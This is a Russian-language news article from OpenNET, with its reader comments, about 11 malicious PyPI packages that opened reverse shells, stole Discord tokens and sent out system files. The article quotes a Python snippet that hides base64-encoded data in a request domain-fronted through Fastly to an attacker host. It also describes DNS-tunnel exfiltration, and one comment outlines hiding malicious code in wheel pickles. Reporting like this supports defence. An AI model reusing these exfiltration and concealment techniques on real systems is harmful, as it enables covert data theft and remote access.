The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

В каталоге PyPI выявлены вредоносные библиотеки, использующие CDN PyPI для скрытия канала связи

20.11.2021 09:52

В каталоге PyPI (Python Package Index) выявлено 11 пакетов, включающих вредоносный код. До выявления проблем в сумме пакеты успели загрузить около 38 тысяч раз. Выявленные вредоносные пакеты примечательны применением замысловатых способов скрытия каналов связи с серверами злоумышленников.

  • importantpackage (6305 загрузок), important-package (12897) - устанавливали соединение с внешним сервером под видом подключения к pypi.python.org для предоставления shell-доступа к системе (reverse shell) и использовали для скрытия канала связи программу trevorc2.
  • pptest (10001), ipboards (946) - использовали DNS в качестве канала связи для передачи сведений о системе (в первом пакете имя хоста, рабочий каталог, внутренний и внешний IP, в во втором - имя пользователя и хоста).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - выявляли в системе токен сервиса Discord и отправляли на внешний хост.
  • trrfab (287) - отправлял на внешний хост идентификатор, имя хоста и содержимое /etc/passwd, /etc/hosts, /home.
  • 10Cent10 (490) - устанавливал обратное shell-соединение с внешним хостом.
  • yandex-yt (4183) - выводил сообщение о компрометации системы и перенаправлял на страницу с дополнительной информацией о дальнейших действиях, выдаваемой через nda.ya.ru (api.ya.cc).

Отдельного внимания заслуживает метод обращения к внешним хостам, используемый в пакетах importantpackage и important-package, которые использовали для скрытия своей активности сеть доставки контента Fastly, применяемую в каталоге PyPI. Фактически запросы отправлялись на сервер pypi.python.org (в том числе, указывая имя python.org в SNI внутри запроса HTTPS), но при этом в HTTP-заголовок "Host" выставлялось имя сервера, подконтрольного атакующим (sec.forward.io.global.prod.fastly.net). Сеть доставки контента направляла подобный запрос на сервер атакующих, используя при передаче данных параметры TLS-соединения с pypi.python.org.

Работа инфраструктуры PyPI обеспечивается с привлечением сети доставки контента Fastly, в которой для кэширования типовых запросов используется прозрачный прокси Varnish, а также применяется обработка TLS-сертификатов на уровне CDN, а не конечных серверов, для организации проброса HTTPS-запросов через прокси. Независимо от целевого хоста запросы направляются в прокси, который определяет нужный хост по HTTP-заголовку "Host", а доменные имена хостов привязываются к типовым для всех клиентов Fastly IP-адресам балансировщиков нагрузки CDN.

Сервер атакующих также регистрируется в CDN Fastly, который предоставляет всем желающим бесплатные тарифные планы и даже допускает анонимную регистрацию. Примечательно, что для отправки запросов жертве при создании "reverse shell" используется также схема, но инициируемая со стороны хоста злоумышленников. Со стороны взаимодействие с сервером атакующих выглядит как легитимный сеанс с каталогом PyPI, шифруемый с использованием TLS-сертификата PyPI. Подобная техника, известная под именем "domain fronting", ранее активно использовалась для скрытия имени хоста при обходе блокировок, используя предоставляемую в некоторых CDN-сетях возможность обращения по HTTPS с указанием в SNI фиктивного хоста и фактической передачей имени запрашиваемого хоста в HTTP-заголовке Host внутри TLS-сеанса.

Для скрытия вредоносной активности дополнительно применялся пакет TrevorC2, позволяющий сделать взаимодействие с сервером похожим на обычную web-навигацию, например, вредоносные запросы отправлялись под видом загрузки изображения "https://pypi.python.org/images/guid=" с кодированием информации в параметре guid.


   url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
   r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

В пакетах pptest и ipboards применялся другой подход для скрытия сетевой активности, основанный на кодировании полезной информации в запросах к DNS-серверу. Вредоносное ПО передаёт информацию, выполняя DNS-запросы вида "nu4timjagq4fimbuhe.example.com", в которых при помощи формата base64 в имени поддомена закодированы передаваемые на управляющий сервер данные. Злоумышленник принимает данные сообщения, контролируя DNS-сервер для домена example.com.

  1. Главная ссылка к новости (https://jfrog.com/blog/python-...)
  2. OpenNews: RangeAmp - серия атак на CDN, манипулирующая HTTP-заголовком Range
  3. OpenNews: 46% Python-пакетов в репозитории PyPI содержат потенциально небезопасный код
  4. OpenNews: Уязвимость в cdnjs, позволившая выполнить код на серверах Cloudflare
  5. OpenNews: Атака CPDoS, позволяющая сделать недоступными страницы, отдаваемые через CDN
  6. OpenNews: Применение тайпсквоттинга для распространения вредоносных модулей NPM, PyPI и Gems
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/56190-pypi
Ключевые слова: pypi, python, malware, pypi, cdn
Поддержать дальнейшую публикацию новостей на OpenNET.


Обсуждение (87) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, 918 (?), 10:04, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    > Сервер атакующих также регистрируется в CDN Fastly, который предоставляет всем желающим бесплатные тарифные планы и даже допускает анонимную регистрацию.

    с ребятами в масках Гая Фокса шутки плохи

     
     
  • 2.15, Аноним (15), 13:13, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    С серьёзными ребятами в масках-балаклавах шутки ещё более плохи.
     
     
  • 3.25, Анонимъ (?), 13:35, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Это одни и те же люди
     
  • 3.26, псевдонимус (?), 13:37, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Будто они не анонимусы для обычных людей.
     

  • 1.3, Аноним (3), 10:13, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    >Фактически запросы отправлялись на сервер pypi.python.org, но при этом в HTTP-заголовок "Host" выставлялось имя сервера, подконтрольного атакующим (sec.forward.io.global.prod.fastly.net).

    Неужели телеграм ещё не поработал над созданием предлога для их запрета в РФ?

     
     
  • 2.18, Аноним (18), 13:22, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    В итоге Павлик Мо^WДуров с товарищем майором подружился, у нас теперь демократия и ничего не блокируется (из интересного хомячкам, конечно, так что линкедин не в счет).
     
     
  • 3.27, Урри (ok), 13:38, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Андрей Юрьевич, если у вас так и не получилось что-то заблокировать, то не надо вешать всем лапшу на уши что это из-за того что с вами договорились, а не из-за того что у вас недостаточно компетентных специалистов.
     
     
  • 4.70, tty0 (?), 21:22, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Вообще, случай с линкед очень показательный: бессмысленная блокировка и наглое нарушение законов. Обе стороны хороши, только неудобства для простых людей.
     
     
  • 5.74, Аноним (74), 22:06, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А какой закон нарушила LinkedIn?
     
     
  • 6.76, Аноним (76), 23:15, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    152 ФЗ по которому личные данные российских пользователей должны храниться на серваках, физически расположенных в РФ. Ну чтобы есличо не заморачиваться писаниной, а просто послать ребят в масках и с калашами диски вытащить с этими данными.
     
     
  • 7.79, Аноним (18), 00:18, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Российские законы в интернете не действуют. Де-факто, интернет - это суверенная территория США, пора бы с этим смириться. Хотите пользоваться интернетом - не нарушайте своими действиями интересы страны-владельца.
     
     
  • 8.85, 1111 (??), 05:41, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    тогда чего вы жалуетесь на действия российских чиновников с инетом идите и жалу... текст свёрнут, показать
     
     
  • 9.91, Аноним (18), 12:11, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Потому что частная собственность должна быть неприкосновенна На каком основании... текст свёрнут, показать
     
     
  • 10.101, Аноним (101), 18:28, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Частная собственность неприкосновенна в государстве не бывает Государственные и... текст свёрнут, показать
     
     
  • 11.113, Аноним (18), 09:53, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да нет, не захотят Ими владеют те же люди, которые определяют политический курс... текст свёрнут, показать
     
  • 8.95, Аноним (95), 14:52, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Китайцам расскажи что в инете американские законы действуют, а не местные Сильн... текст свёрнут, показать
     
     
  • 9.103, Аноним (101), 18:29, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А у китайцев не интернет, у них виннипухнет ... текст свёрнут, показать
     
  • 4.78, Аноним (18), 00:15, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > если у вас так и не получилось что-то заблокировать

    "Не получилось" - это как раз линкедин, который вроде бы заблокирован, но все, кому надо, заходят.

    А телега - это уже практически официальный мессенджер российских властей, даже у какой-нибудь администрации Верхнего Задрючинска уже официальный телеграм-канал есть.

     
     
  • 5.89, Аноним (89), 11:52, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Хотел принять участия в хакатоне, а там: "Присоединитесь к Телеграм-каналу. Всё общение и координация ведётся через него". Шли бы они на пашу с такими замашками.
     
  • 5.105, Урри (ok), 19:24, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Я правильно понял вашу логику - если кто-то из администрации ходит срать в туалет, значит в этом туалете сидят агенты ФСБ?
     
     
  • 6.112, Аноним (18), 09:51, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ФСБ этим не занимается, это работа ФСО.
     
  • 3.46, Аноним (-), 15:19, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Они никогда и не сорились. Спроси у Усманова.
    Совместный проект "псевдопротеста"
     
  • 3.51, Аноним (51), 16:37, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я даже рад. Телеграм очень даже хороший и легковесный мессенджер. Не останется в тени запрета и им будет пользоваться не только 2,5 анонимуса.
     
  • 3.65, Аноним (65), 18:03, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Разве не изначально? Разве это не при павлике в ВК всех пользователей, не привязавших телефон, перестали впускать? Разве телега не требует привязки телефона?
     
  • 2.34, Аноним (34), 14:20, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    У Павла gram не взлетел. Он теперь с кем угодно готов договорится за хорошую сумму.
     
     
  • 3.80, Аноним (18), 00:23, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да он всегда был хорошим бизнесменом. Странно было бы отрицать, что его основные проекты - ВК и телега - монетизируются за счет данных пользователей.
     
     
  • 4.93, Аноним (93), 12:34, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ор, почему он тогда при основании Вконтакте оставил себе так мало акций. А больше половины отдал инвестору? Его развели ровно в тот момент когда ему дали денег на ВК. И грам у него посыпался телеграмм в минусах и вообще у него прибыльных проектов никогда не было. Как перестать орать с Дурова?
     
     
  • 5.99, Аноним (101), 18:22, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Тебе на вк денег не дали, поэтому ты и не миллиардер.
     
  • 5.100, Аноним (101), 18:25, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Имеется в в иду, что даже не смотря на то, что большая часть акций в вк не его, если бы он отказался, то никакого телеграма бы не было. Они с братом хорошо поработали и получили что заслужили.
     

  • 1.4, Аноним (3), 10:26, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +12 +/
    Есть ещё один способ скрытия. Изготавливается пакет. С сорцами на гитхабе. Легитимно выглядящий. В сорцах нет ничего лишнего. Только pickle используется "для ускорения", pickles строятся во время сборки пакета. Pull requestы, выпиливающие pickle, закрываются с мотивацией "я тут автор, и я решаю, что в моём пакете будет".

    А дальше если в пакет на pypi в встроенные в wheel pickles внести вредоносный код, никто и не обнаружит. Мало того, что почти никто не смотрит пакеты на pypi, так ещё pickles - это бинарник, для анализа которого инструментария нормального нет. Соответственно статические анализаторы, которые почти все заточены под исключительно исходник, его пропустят.

     
     
  • 2.9, Аноним (9), 11:12, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +9 +/
    Звучит как история с уже имеющимся пакетом.
     
     
  • 3.71, tty0 (?), 21:24, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Почему только с одним таким пакетом?
     
  • 2.11, keydon (ok), 12:25, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    То же самое можно сказать про любой бинарник и средство сериализации.
    Решается загрузкой через ci only (желательно публичной). Сервису скармливается репозиторий с инструкциями, он их сам собирает и предоставляет логи сборки всем желающим(конечно нужно просмотреть исходники и логи ci, но это все равно проще чем сейчас).
    Учитывая что код на питоне в основном открытый, то такая схема подошла бы как нельзя лучше pypi.
     
     
  • 3.17, Аноним (15), 13:22, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Решается загрузкой через ci only (желательно публичной).

    Не решается в принципе. Корень проблемы в том, что мейнтейнеры некоторых пакетов - моральные уроды. А пакеты поставляются как AS IS. Не нравится - не пользуйся. Или делай свой форк.

     
     
  • 4.72, tty0 (?), 21:25, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Привет snap?
     
     
  • 5.73, Аноним (89), 21:53, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И как снап решает проблему вредоносного ПО, встроенного в СПО создателем этого ПО?
     
     
  • 6.128, я (?), 10:36, 26/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    снап ничего не решает, он добавляет ворох новых проблем
     
  • 2.84, Аноним (84), 05:12, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Там вроде все серьёзные пользователи нейронок используют разной васяности блобы и репозитории блобов. Куда ты там pickle выпиливать собрался, чтобы заменить на что именно?
     
     
  • 3.86, Аноним (89), 09:41, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Не все, а только пользователи pytorchа.
     

  • 1.6, Аноним (3), 10:41, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    >yandex-yt (4183) - выводил сообщение о компрометации системы и перенаправлял на страницу с дополнительной информацией о дальнейших действиях, выдаваемой через nda.ya.ru (api.ya.cc).

    Похоже, что кто-то получил награду в bug bounty.

     
     
  • 2.59, Аноним (59), 17:20, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Только ссылка похожа на внутреннюю и разместил или кто-то из простых сотрудников чтобы потроллить коллег или из безопасников, чтобы сообщить, что неправильно сконфигурили pip
     
     
  • 3.127, Аноним (127), 00:08, 26/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Скорее всего, сами безопасники в рамках pentest-а и разместили.
     

  • 1.8, Аноним (74), 11:09, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Красиво.
     
  • 1.10, Онаним (?), 11:30, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Ахах, очередная бочка дерьма в ложке мёда всяких пипи с нпмами.
    Ничего, нормально, пусть хавают.
     
     
  • 2.13, keydon (ok), 12:35, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это специфично для любого репозитория любого языка с загрузкой пакета без модерации (а модерация экспертами это очень долго и очень дорого, банально пакеты станут золотыми и все равно ничего не гарантирует).
     
     
  • 3.24, Онаним (?), 13:33, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Именно. Специфично для crowd shit intake.
     
     
  • 4.108, Калонизация Луны (?), 21:17, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Тебе бы в психушку. Так полыхать не нормально.
     
     
  • 5.131, ммнюмнюмус (?), 19:29, 05/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А че... общественный дерьмозаборник^^
    в текущей ситуации очень подходящее звание для пипки ;)
     
  • 3.28, Урри (ok), 13:40, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    То-то я смотрю мой дебиан аж светится от количества золота.
     
     
  • 4.40, keydon (ok), 15:06, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > То-то я смотрю мой дебиан аж светится от количества золота.

    Так дебиановцы (и все прочие) только собирают(и адаптируют) пакеты, они конечно смотрят изменения (и то не всегда), но аудит на уязвимости не проводят. Что впрочем тоже неплохо в современных реалиях (и мейнтейнеры тоже золотые люди).

     
     
  • 5.43, Аноним (43), 15:12, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я не дебиановец, но обычно перед установкой пакета я прогоняю bandit, который детектирует топорно сделанные бэкдоры на основе pickle, marshal, subprocess и exec/eval.
     
     
  • 6.83, Козлёнок по имени Антон (?), 03:22, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Часто что-то находится
     
     
  • 7.87, Аноним (89), 09:42, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Регулярно.
     
     
  • 8.102, Аноним (84), 18:28, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Интересно, что ты там устанавливаешь, и куда ты денешься, когда без необходимого... текст свёрнут, показать
     
     
  • 9.104, Аноним (101), 18:36, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Форкну ... текст свёрнут, показать
     
     
  • 10.125, Онаним (?), 00:56, 24/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ты по ходу забыл, что макаки умеют только тянуть пакеты в рот, форкать - это уже... текст свёрнут, показать
     
  • 4.129, я (?), 10:39, 26/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    гугли "ночное золото", так всё на свои места приходит
     
     
  • 5.130, Урри (ok), 20:39, 26/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Если это первая ассоциация, которая пришла к вам в голову - то у меня для вас плохие новости.

    Психиатры, если что, сейчас совсем не дороги.

     

  • 1.14, Аноним (14), 12:49, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +7 +/
    Шутка о том, что «чтобы вирус попал на машину с Linux, нужно чтобы пользователь САМ его скачал, собрал и установил» перестаёт быть просто шуткой.
     
     
  • 2.19, Аноним (19), 13:23, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    В данной новости не про вирусы. Это зловредный код, но не вирус. Т.к. не обладает главной отличительной чертой вируса - саморастпространение пктём заражения исполняемых файлов. И да, это требует, чтобы пользователь САМ это установил у себя.
     
     
  • 3.29, Урри (ok), 13:44, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Смиритесь, в массовом сознании любой зловред называется "вирус".
    Трояны, руткиты, вирусы, бекдоры, адваре, черви, даже сплоиты - это все "вирусы".

    Sad but True.

     
     
  • 4.31, Аноним (31), 13:54, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Тогда получается что в винде by default встроены вирусы
     
     
  • 5.33, нах.. (?), 14:17, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    По другому никогда и не было.
     
     
  • 6.110, Аноним (110), 08:59, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Винда версий NT 3.1 - Win2000 была еще без троянов. Сама она ничего никуда не сливала и странных коннектов непонятно чего непонятно зачем не делала. Хотя некоторые вещи в ней были странно уязвимы к атакам, но хотя бы сама активность не проявляла.
     
     
  • 7.118, Аноним (18), 11:44, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    В те времена нормального рынка бигдаты не было.
     
  • 7.122, yet another anonymous (?), 15:53, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > ... не сливала и странных коннектов непонятно чего непонятно зачем не делала.

    Делала. Я ловил её на этом. Что сливала --- не очень понятно ---- похоже было на свёртку чего-то или "я тут и жива".

     
     
  • 8.124, Аноним (110), 22:29, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Интересно, не помню Может это уже WinXP Просто хорошо помню, что еще Win2k мо... текст свёрнут, показать
     
  • 5.36, Урри (ok), 14:43, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Добро пожаловать в клуб.
     
  • 5.69, Аноним (-), 21:11, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Просто там до этого додумались раньше чем в федоре, убунте или опенсюсе с их /etc/motd и прочим для слива той же телеметрии
     
  • 3.41, Аноним (14), 15:07, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А чем пакеты не вирусы? Выпускаешь пакет, его начинают использовать, рассказывают другим те тоже используют, рассказывают другим и так далее, чем не саморепликация.
     
  • 3.94, Аноним (93), 12:39, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А во времени дискет как вирусы распространялись? А я тебе расскажу: Через дискеты! Вирусы не по воздуху ни по электросети не могут залезть в ПК они мать его сидели записанные на дискету и ждали когда кто-то передаст эту дискету на следующий компьютер и запустит. В дискетах даже авторана не было как на флешках и вирусы все равно распространялись!  
     
     
  • 4.123, yet another anonymous (?), 22:17, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    "На столе лежит дискета
    У неё запорчен бут.
    Через дырочку в конверте
    Её вирусы грызут.
    Тяжела и неказиста
    Жизнь простого программиста." (C)
     

  • 1.23, lockywolf (ok), 13:32, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Fastly не запрещают domain fronting? Зайки какие.
     
  • 1.35, кек (?), 14:31, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Я на хрюникс перешёл, чтобы не качать программы откуда попало, кроме Хрума отродясь не из реп не качал ничего, вы чего?)
     
     
  • 2.38, Аноним (38), 14:55, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    проприетарный хром сам за тебя всё скачает, нибаись
     
     
  • 3.45, кек (?), 15:18, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А я и нибаюсь, свабодная Мазила мне Хрум и порекомендовала
     
  • 3.47, Аноним (14), 15:37, 20/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А что ещё нужно, чудесный браузер сразу на твоём компе с помощью нейросеть обрабатывает твои действия и присылает в гугл уже выжимку кто ты такой и чем занимаешься. Другие браузеры пока в каменном веке и заставляют корпорации сводить данные с разных сервисов и обрабатывать эти данные на своих серверах, а это дорого.

    Помоги корпорациям съэкономить деньги поставь Хром на все свои устройства.
    Или ты не за экологию?

     

  • 1.67, Аноним (74), 18:48, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А в Go такое может быть?
     
     
  • 2.119, Аноним12345 (?), 15:03, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Лехко
    Выполняешь команду
    go get ...
    и тебе закачивается куча софта, о котором ты даже знать не будешь
     

  • 1.75, Аноноша (?), 22:18, 20/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > yandex-yt (4183) - выводил сообщение о компрометации системы и перенаправлял на страницу с дополнительной информацией о дальнейших действиях, выдаваемой через nda.ya.ru (api.ya.cc).

    Похоже, что кто-то опубликовал внутренний модуль наружу. А через nda.ya.ru оборачиваются ссылки на внутренние ресурсы.

     
     
  • 2.81, Аноним (81), 00:53, 21/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > выводил сообщение о компрометации системы

    скорее заведомо сломанный "плохой клон" внутреннего модуля, чтобы никто не загрузил вместо него реально вредоносный и не сломал яндекс через неудачливого питониста

     

  • 1.96, Аноним (96), 15:20, 21/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > DNS-запросы вида "nu4timjagq4fimbuhe.example.com", в которых при помощи формата base64

    С base64 имя может оказаться некорректным же. Видимо речь о base62.

     
  • 1.109, pda (ok), 22:24, 21/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "yiffparty" - название пакета интригует...
     
  • 1.111, Аноним (110), 09:01, 22/11/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Объясните кто-нибудь, а как такая фича вообще может работать?

    > Фактически запросы отправлялись на сервер pypi.python.org (в том числе, указывая имя python.org в SNI внутри запроса HTTPS), но при этом в HTTP-заголовок "Host" выставлялось имя сервера, подконтрольного атакующим (sec.forward.io.global.prod.fastly.net). Сеть доставки контента направляла подобный запрос на сервер атакующих, используя при передаче данных параметры TLS-соединения с pypi.python.org.

    Это багофича конкретной CDN или особенность http/https протокола вообще?

     
     
  • 2.116, Аноним (18), 11:39, 22/11/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Особенность архитектуры CDN и работы конкретных прокси-серверов.
    Бесплатный Varnish (который, по идее, должен обрабатывать заголовки Host) не умеет в SSL, поэтому нужен фронтовый прокси, терминирующий SSL. На котором, очевидно, в заголовки HTTP просто не лезут (хотя могли бы, на каком-нибудь HAProxy сравнение с ssl_fc_sni делается тривиально).
     
  • 2.126, Онаним (?), 01:00, 24/11/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я бы сказал это багофича типовой организации HTTP-over-SSL.
    Когда SNI по факту нужен только для серта, а вся реальная обработка осуществляется уже по Host-хедеру.
     

  • 1.132, ммнюмнюмус (?), 19:37, 05/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Что теперь будет с пакетами, чьи сценарии ставят питон-пакеты с pypi O_o
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:
    При перепечатке указание ссылки на opennet.ru обязательно



    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру